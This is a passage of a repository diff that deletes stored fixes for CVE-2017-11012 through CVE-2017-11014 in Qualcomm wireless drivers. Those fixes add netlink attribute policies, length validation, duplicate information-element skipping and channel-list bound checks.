-QCA_NL80211_VENDOR_SUBCMD_GET_CONCURRENCY_MATRIX which may result in
-buffer overread error.
-
-To resolve this, add nl policy.
-
-Change-Id: I155efdbb07f1c5fe300bb2be0c2a3fe07c7e134b
-CRs-Fixed: 2058455
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 23 +++++++++++++++++------
- 1 file changed, 17 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b8f74cc..0c36e73 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -4985,6 +4985,15 @@ wlan_hdd_cfg80211_get_supported_features(struct wiphy *wiphy,
-     return ret;
- }
- 
-+#define MAX_CONCURRENT_MATRIX \
-+    QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX
-+#define MATRIX_CONFIG_PARAM_SET_SIZE_MAX \
-+    QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX
-+static const struct nla_policy
-+wlan_hdd_get_concurrency_matrix_policy[MAX_CONCURRENT_MATRIX + 1] = {
-+    [MATRIX_CONFIG_PARAM_SET_SIZE_MAX] = {.type = NLA_U32},
-+};
-+
- static int
- __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
-                                          struct wireless_dev *wdev,
-@@ -4992,7 +5001,7 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- {
-     uint32_t feature_set_matrix[WLAN_HDD_MAX_FEATURE_SET] = {0};
-     uint8_t i, feature_sets, max_feature_sets;
--    struct nlattr *tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX + 1];
-+    struct nlattr *tb[MAX_CONCURRENT_MATRIX + 1];
-     struct sk_buff *reply_skb;
-     hdd_context_t *pHddCtx = wiphy_priv(wiphy);
-     int ret;
-@@ -5005,19 +5014,18 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
-         return ret;
-     }
- 
--    if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_MAX,
--                  data, data_len, NULL)) {
-+    if (nla_parse(tb, MAX_CONCURRENT_MATRIX, data, data_len,
-+                  wlan_hdd_get_concurrency_matrix_policy)) {
-         hddLog(LOGE, FL("Invalid ATTR"));
-         return -EINVAL;
-     }
- 
-     /* Parse and fetch max feature set */
--    if (!tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX]) {
-+    if (!tb[MATRIX_CONFIG_PARAM_SET_SIZE_MAX]) {
-         hddLog(LOGE, FL("Attr max feature set size failed"));
-         return -EINVAL;
-     }
--    max_feature_sets = nla_get_u32(
--     tb[QCA_WLAN_VENDOR_ATTR_GET_CONCURRENCY_MATRIX_CONFIG_PARAM_SET_SIZE_MAX]);
-+    max_feature_sets = nla_get_u32(tb[MATRIX_CONFIG_PARAM_SET_SIZE_MAX]);
-     hddLog(LOG1, FL("Max feature set size (%d)"), max_feature_sets);
- 
-     /* Fill feature combination matrix */
-@@ -5068,6 +5076,9 @@ __wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- 
- }
- 
-+#undef MAX_CONCURRENT_MATRIX
-+#undef MATRIX_CONFIG_PARAM_SET_SIZE_MAX
-+
- static int
- wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
-                                          struct wireless_dev *wdev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11012/qcacld-3.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11012/qcacld-3.0/0001.patch
deleted file mode 100644
index fdd7dc56..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11012/qcacld-3.0/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From 7d0e40d328fa092c36b9585516ed29fc6041be55 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Tue, 6 Jun 2017 12:53:28 -0700
-Subject: qcacld-3.0: Fix buffer overread & overflow in DISA handler
-
-Currently in hdd_fill_encrypt_decrypt_params() there are multiple
-issues with the incoming cfg80211 vendor command handling:
-1) A policy is not supplied when invoking nla_parse() which prevents
-   basic sanity of the incoming attribute stream.
-2) The length of attribute QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_PN is
-   not properly validated.
-3) The length of attribute QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_DATA
-   is not properly validated.
-
-To address these issues:
-1) Create an appropriate nla_policy and specify this policy when
-   invoking nla_parse().
-2) Validate the length of QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_PN to
-   prevent potential buffer overflow.
-3) Validate the length of QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_DATA to
-   prevent potential buffer overread.
-
-Change-Id: Ibb86897f249010c94c4098b283aad7a7f95ab9a2
-CRs-Fixed: 2054760
----
- core/hdd/src/wlan_hdd_disa.c | 24 +++++++++++++++++++-----
- 1 file changed, 19 insertions(+), 5 deletions(-)
-
-diff --git a/core/hdd/src/wlan_hdd_disa.c b/core/hdd/src/wlan_hdd_disa.c
-index c2e99d1..39e6bd1 100644
---- a/core/hdd/src/wlan_hdd_disa.c
-+++ b/core/hdd/src/wlan_hdd_disa.c
-@@ -159,6 +159,16 @@ nla_put_failure:
- 	return -EINVAL;
- }
- 
-+static const struct nla_policy
-+encrypt_decrypt_policy[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_MAX + 1] = {
-+	[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_NEEDS_DECRYPTION] = {
-+		.type = NLA_FLAG},
-+	[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_KEYID] = {
-+		.type = NLA_U8},
-+	[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_CIPHER] = {
-+		.type = NLA_U32},
-+};
-+
- /**
-  * hdd_fill_encrypt_decrypt_params () - parses data from user space
-  * and fills encrypt/decrypt parameters
-@@ -181,7 +191,7 @@ static int hdd_fill_encrypt_decrypt_params(struct encrypt_decrypt_req_params
- 	uint8_t fc[2];
- 
- 	if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_MAX,
--		      data, data_len, NULL)) {
-+		      data, data_len, encrypt_decrypt_policy)) {
- 		hdd_err("Invalid ATTR");
- 		return -EINVAL;
- 	}
-@@ -243,8 +253,8 @@ static int hdd_fill_encrypt_decrypt_params(struct encrypt_decrypt_req_params
- 		return -EINVAL;
- 	}
- 	len = nla_len(tb[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_PN]);
--	if (!len) {
--		hdd_err("Invalid PN length");
-+	if (!len || len > sizeof(encrypt_decrypt_params->pn)) {
-+		hdd_err("Invalid PN length %u", len);
- 		return -EINVAL;
- 	}
- 
-@@ -260,8 +270,8 @@ static int hdd_fill_encrypt_decrypt_params(struct encrypt_decrypt_req_params
- 		return -EINVAL;
- 	}
- 	len = nla_len(tb[QCA_WLAN_VENDOR_ATTR_ENCRYPTION_TEST_DATA]);
--	if (!len) {
--		hdd_err("Invalid header and payload length");
-+	if (len < MIN_MAC_HEADER_LEN) {
-+		hdd_err("Invalid header and payload length %u", len);
- 		return -EINVAL;
- 	}
- 
-@@ -298,6 +308,10 @@ static int hdd_fill_encrypt_decrypt_params(struct encrypt_decrypt_req_params
- 
- 	hdd_notice("mac_hdr_len %d", mac_hdr_len);
- 
-+	if (len < mac_hdr_len) {
-+		hdd_err("Invalid header and payload length %u", len);
-+		return -EINVAL;
-+	}
- 	qdf_mem_copy(encrypt_decrypt_params->mac_header,
- 			tmp, mac_hdr_len);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11013/prima/0001.patch b/Patches/Linux_CVEs/CVE-2017-11013/prima/0001.patch
deleted file mode 100644
index 9fe9afdb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11013/prima/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 64297e4caffdf6b1a90807bbdb65a66b43582228 Mon Sep 17 00:00:00 2001
-From: Sridhar Selvaraj <sselvara@codeaurora.org>
-Date: Fri, 30 Jun 2017 19:11:21 +0530
-Subject: prima: Skip an IE if found more its max times in a frame
-
-Check if a IE has been encountered more than max possible for that IE
-while parsing a frame.
-
-Change-Id: I1054c7df18780469849be55fc4343f09ac502a49
-CRs-Fixed: 2069927
----
- CORE/MAC/src/include/dot11f.h          | 6 +++---
- CORE/SYS/legacy/src/utils/src/dot11f.c | 9 +++++++--
- 2 files changed, 10 insertions(+), 5 deletions(-)
-
-diff --git a/CORE/MAC/src/include/dot11f.h b/CORE/MAC/src/include/dot11f.h
-index ab2228e..52c714e 100644
---- a/CORE/MAC/src/include/dot11f.h
-+++ b/CORE/MAC/src/include/dot11f.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2014 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -30,7 +30,7 @@
-   *
-   *
-   * This file was automatically generated by 'framesc'
--  * Mon Nov 10 19:49:53 2014 from the following file(s):
-+  * Tue Jul  4 11:19:48 2017 from the following file(s):
-   *
-   * dot11f.frms
-   *
-@@ -84,8 +84,8 @@ typedef tANI_U32 tDOT11F_U64[2];
- #define DOT11F_BUFFER_OVERFLOW       ( 0x10000005 )
- #define DOT11F_MANDATORY_TLV_MISSING ( 0x00001000 )
- #define DOT11F_FAILED(code)          ( (code) & 0x10000000 )
--#define DOT11F_WARNED(code)          ( ( ( 0 == (code) ) & 0x10000000 ) && code)
- #define DOT11F_SUCCEEDED(code)       ( (code) == 0 )
-+#define DOT11F_WARNED(code)          (!DOT11F_SUCCEEDED(code) && !DOT11F_FAILED(code))
- 
- /*********************************************************************
-  * Fixed Fields                                                      *
-diff --git a/CORE/SYS/legacy/src/utils/src/dot11f.c b/CORE/SYS/legacy/src/utils/src/dot11f.c
-index a4fbb05..f3f621c 100644
---- a/CORE/SYS/legacy/src/utils/src/dot11f.c
-+++ b/CORE/SYS/legacy/src/utils/src/dot11f.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2014 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -28,7 +28,7 @@
-   *
-   *
-   * This file was automatically generated by 'framesc'
--  * Mon Nov 10 19:49:53 2014 from the following file(s):
-+  * Tue Jul  4 11:19:48 2017 from the following file(s):
-   *
-   * dot11f.frms
-   *
-@@ -20733,6 +20733,10 @@ static tANI_U32 UnpackCore(tpAniSirGlobal pCtx,
-                 }
- 
-         countOffset = ( (0 != pIe->arraybound) * ( *(tANI_U16* )(pFrm + pIe->countOffset)));
-+        if (0 != pIe->arraybound && countOffset >= pIe->arraybound) {
-+            status |= DOT11F_DUPLICATE_IE;
-+            goto skip_dup_ie;
-+        }
-                 switch (pIe->sig)
-                 {
-                 case SigIeAPName:
-@@ -21207,6 +21211,7 @@ static tANI_U32 UnpackCore(tpAniSirGlobal pCtx,
-             status |= DOT11F_UNKNOWN_IES;
-         }
- 
-+skip_dup_ie:
-         pBufRemaining += len;
- 
-          if (len > nBufRemaining)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch
deleted file mode 100644
index 4ae65834..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/src/include/dot11f.h b/drivers/staging/qcacld-2.0/CORE/MAC/src/include/dot11f.h
-index 111c093..10f1872 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/src/include/dot11f.h
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/src/include/dot11f.h
-@@ -24,7 +24,6 @@
-  * under proprietary terms before Copyright ownership was assigned
-  * to the Linux Foundation.
-  */
--
- #ifndef DOT11F_H
- #define DOT11F_H
- /**
-@@ -37,7 +36,7 @@
-   *
-   *
-   * This file was automatically generated by 'framesc'
--  * Tue Sep 29 17:32:33 2015 from the following file(s):
-+  * Tue Jul  4 11:07:27 2017 from the following file(s):
-   *
-   * dot11f.frms
-   *
-@@ -91,8 +90,8 @@
- #define DOT11F_BUFFER_OVERFLOW       ( 0x10000005 )
- #define DOT11F_MANDATORY_TLV_MISSING ( 0x00001000 )
- #define DOT11F_FAILED(code)          ( (code) & 0x10000000 )
--#define DOT11F_WARNED(code)          ( ( ( 0 == (code) ) & 0x10000000 ) && code)
- #define DOT11F_SUCCEEDED(code)       ( (code) == 0 )
-+#define DOT11F_WARNED(code)          (!DOT11F_SUCCEEDED(code) && !DOT11F_FAILED(code))
- 
- /*********************************************************************
-  * Fixed Fields                                                      *
-diff --git a/drivers/staging/qcacld-2.0/CORE/SYS/legacy/src/utils/src/dot11f.c b/drivers/staging/qcacld-2.0/CORE/SYS/legacy/src/utils/src/dot11f.c
-index 0f542d0..c19e9c0 100644
---- a/drivers/staging/qcacld-2.0/CORE/SYS/legacy/src/utils/src/dot11f.c
-+++ b/drivers/staging/qcacld-2.0/CORE/SYS/legacy/src/utils/src/dot11f.c
-@@ -35,7 +35,7 @@
-   *
-   *
-   * This file was automatically generated by 'framesc'
--  * Tue Sep 29 17:32:33 2015 from the following file(s):
-+  * Tue Jul  4 11:07:27 2017 from the following file(s):
-   *
-   * dot11f.frms
-   *
-@@ -18778,6 +18778,10 @@
-                 }
- 
-         countOffset = ( (0 != pIe->arraybound) * ( *(tANI_U16* )(pFrm + pIe->countOffset)));
-+        if (0 != pIe->arraybound && countOffset >= pIe->arraybound) {
-+            status |= DOT11F_DUPLICATE_IE;
-+            goto skip_dup_ie;
-+        }
-                 switch (pIe->sig)
-                 {
-                 case SigIeCondensedCountryStr:
-@@ -19215,6 +19219,7 @@
-             status |= DOT11F_UNKNOWN_IES;
-         }
- 
-+skip_dup_ie:
-         pBufRemaining += len;
- 
-          if (len > nBufRemaining)
diff --git a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch.base64
deleted file mode 100644
index 83d01d6b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-2.0/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvc3RhZ2luZy9xY2FjbGQtMi4wL0NPUkUvTUFDL3NyYy9pbmNsdWRlL2RvdDExZi5oIGIvZHJpdmVycy9zdGFnaW5nL3FjYWNsZC0yLjAvQ09SRS9NQUMvc3JjL2luY2x1ZGUvZG90MTFmLmgKaW5kZXggMTExYzA5My4uMTBmMTg3MiAxMDA2NDQKLS0tIGEvZHJpdmVycy9zdGFnaW5nL3FjYWNsZC0yLjAvQ09SRS9NQUMvc3JjL2luY2x1ZGUvZG90MTFmLmgKKysrIGIvZHJpdmVycy9zdGFnaW5nL3FjYWNsZC0yLjAvQ09SRS9NQUMvc3JjL2luY2x1ZGUvZG90MTFmLmgKQEAgLTI0LDcgKzI0LDYgQEAKICAqIHVuZGVyIHByb3ByaWV0YXJ5IHRlcm1zIGJlZm9yZSBDb3B5cmlnaHQgb3duZXJzaGlwIHdhcyBhc3NpZ25lZAogICogdG8gdGhlIExpbnV4IEZvdW5kYXRpb24uCiAgKi8KLQogI2lmbmRlZiBET1QxMUZfSAogI2RlZmluZSBET1QxMUZfSAogLyoqCkBAIC0zNyw3ICszNiw3IEBACiAgICoKICAgKgogICAqIFRoaXMgZmlsZSB3YXMgYXV0b21hdGljYWxseSBnZW5lcmF0ZWQgYnkgJ2ZyYW1lc2MnCi0gICogVHVlIFNlcCAyOSAxNzozMjozMyAyMDE1IGZyb20gdGhlIGZvbGxvd2luZyBmaWxlKHMpOgorICAqIFR1ZSBKdWwgIDQgMTE6MDc6MjcgMjAxNyBmcm9tIHRoZSBmb2xsb3dpbmcgZmlsZShzKToKICAgKgogICAqIGRvdDExZi5mcm1zCiAgICoKQEAgLTkxLDggKzkwLDggQEAKICNkZWZpbmUgRE9UMTFGX0JVRkZFUl9PVkVSRkxPVyAgICAgICAoIDB4MTAwMDAwMDUgKQogI2RlZmluZSBET1QxMUZfTUFOREFUT1JZX1RMVl9NSVNTSU5HICggMHgwMDAwMTAwMCApCiAjZGVmaW5lIERPVDExRl9GQUlMRUQoY29kZSkgICAgICAgICAgKCAoY29kZSkgJiAweDEwMDAwMDAwICkKLSNkZWZpbmUgRE9UMTFGX1dBUk5FRChjb2RlKSAgICAgICAgICAoICggKCAwID09IChjb2RlKSApICYgMHgxMDAwMDAwMCApICYmIGNvZGUpCiAjZGVmaW5lIERPVDExRl9TVUNDRUVERUQoY29kZSkgICAgICAgKCAoY29kZSkgPT0gMCApCisjZGVmaW5lIERPVDExRl9XQVJORUQoY29kZSkgICAgICAgICAgKCFET1QxMUZfU1VDQ0VFREVEKGNvZGUpICYmICFET1QxMUZfRkFJTEVEKGNvZGUpKQogCiAvKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCiAgKiBGaXhlZCBGaWVsZHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCmRpZmYgLS1naXQgYS9kcml2ZXJzL3N0YWdpbmcvcWNhY2xkLTIuMC9DT1JFL1NZUy9sZWdhY3kvc3JjL3V0aWxzL3NyYy9kb3QxMWYuYyBiL2RyaXZlcnMvc3RhZ2luZy9xY2FjbGQtMi4wL0NPUkUvU1lTL2xlZ2FjeS9zcmMvdXRpbHMvc3JjL2RvdDExZi5jCmluZGV4IDBmNTQyZDAuLmMxOWU5YzAgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvc3RhZ2luZy9xY2FjbGQtMi4wL0NPUkUvU1lTL2xlZ2FjeS9zcmMvdXRpbHMvc3JjL2RvdDExZi5jCisrKyBiL2RyaXZlcnMvc3RhZ2luZy9xY2FjbGQtMi4wL0NPUkUvU1lTL2xlZ2FjeS9zcmMvdXRpbHMvc3JjL2RvdDExZi5jCkBAIC0zNSw3ICszNSw3IEBACiAgICoKICAgKgogICAqIFRoaXMgZmlsZSB3YXMgYXV0b21hdGljYWxseSBnZW5lcmF0ZWQgYnkgJ2ZyYW1lc2MnCi0gICogVHVlIFNlcCAyOSAxNzozMjozMyAyMDE1IGZyb20gdGhlIGZvbGxvd2luZyBmaWxlKHMpOgorICAqIFR1ZSBKdWwgIDQgMTE6MDc6MjcgMjAxNyBmcm9tIHRoZSBmb2xsb3dpbmcgZmlsZShzKToKICAgKgogICAqIGRvdDExZi5mcm1zCiAgICoKQEAgLTE4Nzc4LDYgKzE4Nzc4LDEwIEBACiAgICAgICAgICAgICAgICAgfQogCiAgICAgICAgIGNvdW50T2Zmc2V0ID0gKCAoMCAhPSBwSWUtPmFycmF5Ym91bmQpICogKCAqKHRBTklfVTE2KiApKHBGcm0gKyBwSWUtPmNvdW50T2Zmc2V0KSkpOworICAgICAgICBpZiAoMCAhPSBwSWUtPmFycmF5Ym91bmQgJiYgY291bnRPZmZzZXQgPj0gcEllLT5hcnJheWJvdW5kKSB7CisgICAgICAgICAgICBzdGF0dXMgfD0gRE9UMTFGX0RVUExJQ0FURV9JRTsKKyAgICAgICAgICAgIGdvdG8gc2tpcF9kdXBfaWU7CisgICAgICAgIH0KICAgICAgICAgICAgICAgICBzd2l0Y2ggKHBJZS0+c2lnKQogICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICBjYXNlIFNpZ0llQ29uZGVuc2VkQ291bnRyeVN0cjoKQEAgLTE5MjE1LDYgKzE5MjE5LDcgQEAKICAgICAgICAgICAgIHN0YXR1cyB8PSBET1QxMUZfVU5LTk9XTl9JRVM7CiAgICAgICAgIH0KIAorc2tpcF9kdXBfaWU6CiAgICAgICAgIHBCdWZSZW1haW5pbmcgKz0gbGVuOwogCiAgICAgICAgICBpZiAobGVuID4gbkJ1ZlJlbWFpbmluZykK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-3.0/0003.patch b/Patches/Linux_CVEs/CVE-2017-11013/qcacld-3.0/0003.patch
deleted file mode 100644
index eca9ffd7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-3.0/0003.patch
+++ /dev/null
@@ -1,98 +0,0 @@
-From c9f8654b11a1e693022ad7f163b3bc477fea8ce8 Mon Sep 17 00:00:00 2001
-From: Naveen Rawat <naveenrawat@codeaurora.org>
-Date: Fri, 9 Jun 2017 14:25:45 -0700
-Subject: qcacld-3.0: Skip an IE if found more its max times in a frame
-
-Check if a IE has been encountered more than max possible for that IE
-while parsing a frame.
-
-Change-Id: I1054c7df18780469849be55fc4343f09ac502a49
-CRs-Fixed: 2058261
----
- core/mac/src/include/dot11f.h                  |  4 ++--
- core/mac/src/sys/legacy/src/utils/src/dot11f.c | 25 +++++++++++++------------
- 2 files changed, 15 insertions(+), 14 deletions(-)
-
-diff --git a/core/mac/src/include/dot11f.h b/core/mac/src/include/dot11f.h
-index 96b8c6c..c5be2fd 100644
---- a/core/mac/src/include/dot11f.h
-+++ b/core/mac/src/include/dot11f.h
-@@ -35,7 +35,7 @@
-  *
-  *
-  * This file was automatically generated by 'framesc'
-- * Mon Mar 13 16:17:19 2017 from the following file(s):
-+ * Fri Jun  9 14:23:47 2017 from the following file(s):
-  *
-  * dot11f.frms
-  *
-@@ -88,8 +88,8 @@ typedef uint32_t tDOT11F_U64[2];
- #define DOT11F_BUFFER_OVERFLOW       (0x10000005)
- #define DOT11F_MANDATORY_TLV_MISSING (0x00001000)
- #define DOT11F_FAILED(code)          ((code) & 0x10000000)
--#define DOT11F_WARNED(code)          (((0 == (code)) & 0x10000000) && code)
- #define DOT11F_SUCCEEDED(code)       ((code) == 0)
-+#define DOT11F_WARNED(code)          (!DOT11F_SUCCEEDED(code) && !DOT11F_FAILED(code))
- 
- /*********************************************************************
-  * Fixed Fields                                                      *
-diff --git a/core/mac/src/sys/legacy/src/utils/src/dot11f.c b/core/mac/src/sys/legacy/src/utils/src/dot11f.c
-index 210cf89..a6089b3 100644
---- a/core/mac/src/sys/legacy/src/utils/src/dot11f.c
-+++ b/core/mac/src/sys/legacy/src/utils/src/dot11f.c
-@@ -33,7 +33,7 @@
-  *
-  *
-  * This file was automatically generated by 'framesc'
-- * Mon Mar 13 16:17:19 2017 from the following file(s):
-+ * Fri Jun  9 14:23:47 2017 from the following file(s):
-  *
-  * dot11f.frms
-  *
-@@ -9240,6 +9240,10 @@ static uint32_t unpack_core(tpAniSirGlobal pCtx,
- 
- 				countOffset = ((0 != pIe->arraybound) *
- 						(*(uint16_t *)(pFrm + pIe->countOffset)));
-+				if (0 != pIe->arraybound && countOffset >= pIe->arraybound) {
-+					status |= DOT11F_DUPLICATE_IE;
-+					goto skip_dup_ie;
-+				}
- 				switch (pIe->sig) {
- 				case SigIeGTK:
- 					status |=
-@@ -9819,17 +9823,13 @@ static uint32_t unpack_core(tpAniSirGlobal pCtx,
- 						    countOffset));
- 					break;
- 				case SigIeNeighborReport:
--					if (countOffset < MAX_SUPPORTED_NEIGHBOR_RPT) {
--						status |=
--							dot11f_unpack_ie_neighbor_report(
--							    pCtx, pBufRemaining, len,
--							    (tDot11fIENeighborReport *)
--							    (pFrm + pIe->offset +
--							    sizeof(tDot11fIENeighborReport) *
--							    countOffset));
--					} else {
--						status |= DOT11F_BUFFER_OVERFLOW;
--					}
-+					status |=
-+						dot11f_unpack_ie_neighbor_report(
-+						    pCtx, pBufRemaining, len,
-+						    (tDot11fIENeighborReport *)
-+						    (pFrm + pIe->offset +
-+						    sizeof(tDot11fIENeighborReport) *
-+						    countOffset));
- 					break;
- 				case SigIeOBSSScanParameters:
- 					status |=
-@@ -10427,6 +10427,7 @@ static uint32_t unpack_core(tpAniSirGlobal pCtx,
- 			status |= DOT11F_UNKNOWN_IES;
- 		}
- 
-+skip_dup_ie:
- 		pBufRemaining += len;
- 
- 		if (len > nBufRemaining) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11014/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11014/qcacld-2.0/0001.patch
deleted file mode 100644
index 8dab716a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11014/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From adb96af5b080dfe4ee29961a17ed3f04c87d5519 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Mon, 21 Aug 2017 16:56:01 -0700
-Subject: [PATCH] qcacld-2.0: Add bound check before writing to channel list
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-In function rrm_process_beacon_report_req, add bound check before
-writing to channel list which is of fixed size.
-
-Change-Id: I3c80974bba84a96f7b85e4ce62bbb01c23b4babf
-CRs-Fixed: 2060138
-Bug: 64438727
-Signed-off-by: Srinivas Girigowda <sgirigow@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c | 17 ++++++++++++-----
- 1 file changed, 12 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c
-index 3fb65c45c2925..ddf22cd957db2 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c
-@@ -628,14 +628,21 @@ rrmProcessBeaconReportReq( tpAniSirGlobal pMac,
-    pSmeBcnReportReq->channelList.numChannels = num_channels;
-    if( pBeaconReq->measurement_request.Beacon.num_APChannelReport )
-    {
--      tANI_U8 *pChanList = pSmeBcnReportReq->channelList.channelNumber;
-+      tANI_U8 *ch_lst = pSmeBcnReportReq->channelList.channelNumber;
-+      uint8_t len;
-+      uint16_t ch_ctr = 0;
-       for( num_APChanReport = 0 ; num_APChanReport < pBeaconReq->measurement_request.Beacon.num_APChannelReport ; num_APChanReport++ )
-       {
--         vos_mem_copy(pChanList,
--          pBeaconReq->measurement_request.Beacon.APChannelReport[num_APChanReport].channelList,
--          pBeaconReq->measurement_request.Beacon.APChannelReport[num_APChanReport].num_channelList);
-+         len = pBeaconReq->measurement_request.Beacon.
-+                            APChannelReport[num_APChanReport].num_channelList;
-+         if(ch_ctr + len > sizeof(pSmeBcnReportReq->channelList.channelNumber))
-+            break;
-+
-+         vos_mem_copy(&ch_lst[ch_ctr],
-+                      pBeaconReq->measurement_request.Beacon.
-+                      APChannelReport[num_APChanReport].channelList, len);
- 
--         pChanList += pBeaconReq->measurement_request.Beacon.APChannelReport[num_APChanReport].num_channelList;
-+         ch_ctr += len;
-       }
-    }
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-11014/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-11014/qcacld-3.0/0002.patch
deleted file mode 100644
index 4a03b1cb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11014/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From ec58bc99e29d89f8e164954999ef8a45cec21754 Mon Sep 17 00:00:00 2001
-From: Krishna Kumaar Natarajan <kknatara@codeaurora.org>
-Date: Wed, 5 Jul 2017 16:47:45 -0700
-Subject: qcacld-3.0: Update lim_compute_crc32() to pass uint16_t
-
-Update lim_compute_crc32() to pass uint16_t as a length type.
-Currently uint8_t is being passed as length and there will be type
-mismatch when authentication frame to be encrypted will be larger
-than 255 bytes.
-
-Change-Id: Ic009197c13a2d70c9015a184acff2e82bf80eaba
-CRs-Fixed: 2060959
----
- core/mac/src/pe/lim/lim_security_utils.c | 2 +-
- core/mac/src/pe/lim/lim_security_utils.h | 4 ++--
- 2 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/core/mac/src/pe/lim/lim_security_utils.c b/core/mac/src/pe/lim/lim_security_utils.c
-index c5938c2..1a2964c 100644
---- a/core/mac/src/pe/lim/lim_security_utils.c
-+++ b/core/mac/src/pe/lim/lim_security_utils.c
-@@ -596,7 +596,7 @@ lim_encrypt_auth_frame(tpAniSirGlobal pMac, uint8_t keyId, uint8_t *pKey,
-  * @return None
-  */
- 
--void lim_compute_crc32(uint8_t *pDest, uint8_t *pSrc, uint8_t len)
-+void lim_compute_crc32(uint8_t *pDest, uint8_t *pSrc, uint16_t len)
- {
- 	uint32_t crc;
- 	int i;
-diff --git a/core/mac/src/pe/lim/lim_security_utils.h b/core/mac/src/pe/lim/lim_security_utils.h
-index c5b30ba..c3410ea 100644
---- a/core/mac/src/pe/lim/lim_security_utils.h
-+++ b/core/mac/src/pe/lim/lim_security_utils.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2015 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
